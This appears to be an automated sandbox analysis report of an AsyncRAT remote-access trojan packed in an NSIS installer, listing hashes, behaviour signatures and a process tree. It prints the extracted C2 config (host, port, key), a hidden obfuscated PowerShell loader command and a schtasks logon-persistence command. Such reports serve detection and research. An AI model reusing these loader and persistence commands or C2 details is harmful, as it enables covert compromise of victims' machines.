Overview
overview
10Static
static
337d1af5c7a...01.exe
windows7-x64
837d1af5c7a...01.exe
windows10-2004-x64
10$PLUGINSDI...ge.dll
windows7-x64
3$PLUGINSDI...ge.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
142s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04/09/2024, 01:35
Static task
static1
Behavioral task
behavioral1
Sample
37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
-
Size
579KB
-
MD5
8eb6236d11b0463ae82eb268ccc1f7e9
-
SHA1
08e1140bb7dd86231b8dbbc686e894cfe1d1c7b0
-
SHA256
37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01
-
SHA512
d07bf2ec8ca8a57475b1d03214dea1b5c2f300962618d8fde5d987d94c749a0282cb639d6162d79ba10010c05f3df22b7e5d1036cb91bfdd1475198f82fc1af5
-
SSDEEP
12288:sCn4AyHnseftJpS/mErsKah4dNTTdAPCDbWhwP8wEV:/nEnseftbYmtX4pTywP8R
Malware Config
Extracted
asyncrat
0.5.8
Default
fresh01.ddns.net:2256
waVkxgc3A4Ar
-
delay
3
-
install
true
-
install_file
logs.exe
-
install_folder
%AppData%
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 5012 powershell.exe 3912 powershell.exe 4388 powershell.exe 4304 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Landingspunkternes.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Landingspunkternes.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Landingspunkternes.exe -
Executes dropped EXE 3 IoCs
pid Process 2896 logs.exe 5024 logs.exe 4268 logs.exe -
Loads dropped DLL 14 IoCs
pid Process 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 1620 Landingspunkternes.exe 2896 logs.exe 2896 logs.exe 2680 Landingspunkternes.exe 5024 logs.exe 5024 logs.exe 4276 Landingspunkternes.exe 4268 logs.exe 4268 logs.exe 1424 Landingspunkternes.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs
pid Process 1620 Landingspunkternes.exe 2680 Landingspunkternes.exe 4276 Landingspunkternes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4304 powershell.exe 1620 Landingspunkternes.exe 5012 powershell.exe 2680 Landingspunkternes.exe 3912 powershell.exe 4276 Landingspunkternes.exe 4388 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4304 set thread context of 1620 4304 powershell.exe 95 PID 5012 set thread context of 2680 5012 powershell.exe 107 PID 3912 set thread context of 4276 3912 powershell.exe 117 PID 4388 set thread context of 1424 4388 powershell.exe 127 -
Drops file in Program Files directory 8 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod logs.exe File opened for modification C:\Program Files (x86)\astonied.ini logs.exe File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod logs.exe File opened for modification C:\Program Files (x86)\astonied.ini 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe File opened for modification C:\Program Files (x86)\astonied.ini logs.exe File opened for modification C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod logs.exe File opened for modification C:\Program Files (x86)\astonied.ini logs.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\resources\sammentrkket\fatherlike.lnk logs.exe File opened for modification C:\Windows\Fonts\frasiger.ini logs.exe File created C:\Windows\resources\sammentrkket\fatherlike.lnk logs.exe File opened for modification C:\Windows\Fonts\frasiger.ini 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe File created C:\Windows\resources\sammentrkket\fatherlike.lnk 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe File opened for modification C:\Windows\Fonts\frasiger.ini logs.exe File created C:\Windows\resources\sammentrkket\fatherlike.lnk logs.exe File opened for modification C:\Windows\Fonts\frasiger.ini logs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Landingspunkternes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Landingspunkternes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Landingspunkternes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language logs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language logs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Landingspunkternes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language logs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x000600000002270e-71.dat nsis_installer_1 behavioral2/files/0x000600000002270e-71.dat nsis_installer_2 -
Delays execution with timeout.exe 3 IoCs
pid Process 1476 timeout.exe 3164 timeout.exe 452 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4276 schtasks.exe 4848 schtasks.exe 1668 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 1620 Landingspunkternes.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 5012 powershell.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 2680 Landingspunkternes.exe 3912 powershell.exe 3912 powershell.exe 3912 powershell.exe 3912 powershell.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4304 powershell.exe 5012 powershell.exe 3912 powershell.exe 4388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4304 powershell.exe Token: SeDebugPrivilege 1620 Landingspunkternes.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 2680 Landingspunkternes.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 4276 Landingspunkternes.exe Token: SeDebugPrivilege 4388 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5080 wrote to memory of 4304 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 85 PID 5080 wrote to memory of 4304 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 85 PID 5080 wrote to memory of 4304 5080 37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe 85 PID 4304 wrote to memory of 1620 4304 powershell.exe 95 PID 4304 wrote to memory of 1620 4304 powershell.exe 95 PID 4304 wrote to memory of 1620 4304 powershell.exe 95 PID 4304 wrote to memory of 1620 4304 powershell.exe 95 PID 4304 wrote to memory of 1620 4304 powershell.exe 95 PID 1620 wrote to memory of 3116 1620 Landingspunkternes.exe 97 PID 1620 wrote to memory of 3116 1620 Landingspunkternes.exe 97 PID 1620 wrote to memory of 3116 1620 Landingspunkternes.exe 97 PID 1620 wrote to memory of 1964 1620 Landingspunkternes.exe 99 PID 1620 wrote to memory of 1964 1620 Landingspunkternes.exe 99 PID 1620 wrote to memory of 1964 1620 Landingspunkternes.exe 99 PID 3116 wrote to memory of 4276 3116 cmd.exe 101 PID 3116 wrote to memory of 4276 3116 cmd.exe 101 PID 3116 wrote to memory of 4276 3116 cmd.exe 101 PID 1964 wrote to memory of 1476 1964 cmd.exe 102 PID 1964 wrote to memory of 1476 1964 cmd.exe 102 PID 1964 wrote to memory of 1476 1964 cmd.exe 102 PID 1964 wrote to memory of 2896 1964 cmd.exe 103 PID 1964 wrote to memory of 2896 1964 cmd.exe 103 PID 1964 wrote to memory of 2896 1964 cmd.exe 103 PID 2896 wrote to memory of 5012 2896 logs.exe 104 PID 2896 wrote to memory of 5012 2896 logs.exe 104 PID 2896 wrote to memory of 5012 2896 logs.exe 104 PID 5012 wrote to memory of 2680 5012 powershell.exe 107 PID 5012 wrote to memory of 2680 5012 powershell.exe 107 PID 5012 wrote to memory of 2680 5012 powershell.exe 107 PID 5012 wrote to memory of 2680 5012 powershell.exe 107 PID 5012 wrote to memory of 2680 5012 powershell.exe 107 PID 2680 wrote to memory of 2816 2680 Landingspunkternes.exe 108 PID 2680 wrote to memory of 2816 2680 Landingspunkternes.exe 108 PID 2680 wrote to memory of 2816 2680 Landingspunkternes.exe 108 PID 2816 wrote to memory of 4848 2816 cmd.exe 110 PID 2816 wrote to memory of 4848 2816 cmd.exe 110 PID 2816 wrote to memory of 4848 2816 cmd.exe 110 PID 2680 wrote to memory of 3104 2680 Landingspunkternes.exe 111 PID 2680 wrote to memory of 3104 2680 Landingspunkternes.exe 111 PID 2680 wrote to memory of 3104 2680 Landingspunkternes.exe 111 PID 3104 wrote to memory of 3164 3104 cmd.exe 113 PID 3104 wrote to memory of 3164 3104 cmd.exe 113 PID 3104 wrote to memory of 3164 3104 cmd.exe 113 PID 3104 wrote to memory of 5024 3104 cmd.exe 114 PID 3104 wrote to memory of 5024 3104 cmd.exe 114 PID 3104 wrote to memory of 5024 3104 cmd.exe 114 PID 5024 wrote to memory of 3912 5024 logs.exe 115 PID 5024 wrote to memory of 3912 5024 logs.exe 115 PID 5024 wrote to memory of 3912 5024 logs.exe 115 PID 3912 wrote to memory of 4276 3912 powershell.exe 117 PID 3912 wrote to memory of 4276 3912 powershell.exe 117 PID 3912 wrote to memory of 4276 3912 powershell.exe 117 PID 3912 wrote to memory of 4276 3912 powershell.exe 117 PID 3912 wrote to memory of 4276 3912 powershell.exe 117 PID 4276 wrote to memory of 4716 4276 Landingspunkternes.exe 118 PID 4276 wrote to memory of 4716 4276 Landingspunkternes.exe 118 PID 4276 wrote to memory of 4716 4276 Landingspunkternes.exe 118 PID 4716 wrote to memory of 1668 4716 cmd.exe 120 PID 4716 wrote to memory of 1668 4716 cmd.exe 120 PID 4716 wrote to memory of 1668 4716 cmd.exe 120 PID 4276 wrote to memory of 536 4276 Landingspunkternes.exe 121 PID 4276 wrote to memory of 536 4276 Landingspunkternes.exe 121 PID 4276 wrote to memory of 536 4276 Landingspunkternes.exe 121 PID 536 wrote to memory of 452 536 cmd.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe"C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4419.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1476
-
-
C:\Users\Admin\AppData\Roaming\logs.exe"C:\Users\Admin\AppData\Roaming\logs.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"7⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDC90.tmp.bat""8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3164
-
-
C:\Users\Admin\AppData\Roaming\logs.exe"C:\Users\Admin\AppData\Roaming\logs.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"11⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"' & exit12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "logs" /tr '"C:\Users\Admin\AppData\Roaming\logs.exe"'13⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp795C.tmp.bat""12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SysWOW64\timeout.exetimeout 313⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:452
-
-
C:\Users\Admin\AppData\Roaming\logs.exe"C:\Users\Admin\AppData\Roaming\logs.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"15⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1424
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40B
MD505c70eab829786b13f4250010970e93e
SHA11f3e904027d380cb6fce257deb4bbe28626296dd
SHA256957608d4fdf7a422674dc07bd33d9b698b1009e664de3a54f848d40dde234244
SHA5124f1be0e7fbc87876c22d1c8f785db1e9737593c3e2474100dc13ea8d102833c3d2ba599e9031bcc26fcc1e7ff3d0fc7876d7643fe4deff5fef50fcd6bbd88d9a
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD587e3a7462732224ad68974d2e5c629da
SHA1a19da17d3a4070f8df1ef131302fd0728b7de838
SHA2566766896c0c5d29eabe2e399a797db760d98b1f0f473ee1e33aa08cf7c3241463
SHA5122519574908d0b9bbeb7c1a737be99785dd1dc610f684aa09ebf01a15e581c170a10fdee07ed2bd526f052c0d4672737fbb404d2b876cd3c2f3e9f36507644573
-
Filesize
522B
MD5acc9090417037dfa2a55b46ed86e32b8
SHA153fa6fb25fb3e88c24d2027aca6ae492b2800a4d
SHA2562412679218bb0a7d05ceee32869bbb223619bde9966c4c460a68304a3367724b
SHA512d51f7085ec147c708f446b9fb6923cd2fb64596d354ed929e125b30ace57c8cb3217589447a36960e5d3aea87a4e48aaa82c7509eced6d6c2cecd71fcfe3697b
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
579KB
MD58eb6236d11b0463ae82eb268ccc1f7e9
SHA108e1140bb7dd86231b8dbbc686e894cfe1d1c7b0
SHA25637d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01
SHA512d07bf2ec8ca8a57475b1d03214dea1b5c2f300962618d8fde5d987d94c749a0282cb639d6162d79ba10010c05f3df22b7e5d1036cb91bfdd1475198f82fc1af5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD549998d066af103d06b56f5b4c76b1497
SHA1b7dce166147f40dfa17f5ca950c4e324a10d04be
SHA25695042dbe7428461ee7fd210acf37040eb921012c7b32f66cb54766f0a16bb5b6
SHA51261b0d75ef3a18c8c13ad8c614a012a71cbc4f6fd4bba0aa0c7b866e1a8fbf5f9fdb3e012a3566586d47fc8b456a7de36a06a0d70cdf27e504aac64eab37555d7
-
Filesize
9KB
MD519d3373e403a6e724cfa1563dfd1f463
SHA14917547b355a91e9431879209f56925097bf4fb3
SHA256873fa0c52eae7cfbed56ea18b21fad0ca8f018ab7f305bd1db1a3ec454e353d1
SHA512b6f6db23376ade4bb864ea14244980612f42f322d3915540090bfe8edc80e9577b7aec3589bd587ca47a729371ed8ab8e6e23031bb3e3f524d48783637646193
-
Filesize
6KB
MD56c881f00ba860b17821d8813aa34dbc6
SHA10e5a1e09b1ce1bc758d6977b913a8d9ccbe52a13
SHA256bcb93204bd1854d0c34fa30883bab51f6813ab32abf7fb7d4aeed21d71f6af87
SHA512c78d6f43aa9bb35260a7bd300392ce809282660283fa6cb3059bae50d6db229b0b853cab7c949d4bdf19309fb183257b1c9feb01a66347e1c0adeb21543315b6
-
Filesize
148B
MD59d23a728c0dcb1d85ba95b5df69aad5e
SHA12685f0b6cfb9bf5a6ac238717c35c702fd0fe787
SHA256bbb4d06f0f9a492c7791b603fce8a2e7e76cd6347525341b7533f9e58c5b913a
SHA5122d617337d9befad4df51b498a3464ec1076b07946e052ecde92a3f7a0de677cbffa7704ada3e7d753be3352f0ff9982fbc90d9f53577ae9c64d2926432f14064
-
Filesize
148B
MD5fbe1c9fa58bef1a8b2e7556b14a12748
SHA16734c8315d8c4b7b38167c92c3f5a88cf3ed1742
SHA25613ed1d6d9033cb76e5275e46f209d0f1317037df53574e928ecaa0f1a8385e0a
SHA5120c2e3c9b06dafe81530f5b1f7d30307d688cf12a1441979193390d7fb3cbf316476affd54ffff1cd5a13d356f23e47d924228e2ae129f97697c92144ae425d19
-
Filesize
148B
MD50b7a9b3fbb2e2839e88cfa021f22b8d3
SHA1b7bb2e34a3c3c01007d4d8d2e9be03a243f5abf3
SHA256d38cd62a3fc25a257120fecab6c43dfa1dc8d8429c3d58207c93e9be40aa0727
SHA512300b5d2fc94702c731ced3f03dae0054c1d102e52d8e06fb9fc17dc7806a1828d8c82dca0edb225c6a85627ea1adecc0d23d4332b2f0210d94cac56ffb1b3107
-
Filesize
67KB
MD5f920388117d05e71adf552e886f824ca
SHA11ea3664c4cf6305438c1fc84b7c6d980f39ae0b5
SHA256ad0c18269a3971545eedcd2ddb5617c8dfd34e452bd43a1bf287d7b8be902289
SHA512f2d3da62202662f6a29510f9ea2f66e144565d53839aa878c9589bafb5397457d9a67abdaf9cd3b8f98a56e50dba64176251a6d90c403008a73bfd158985d96f
-
Filesize
329KB
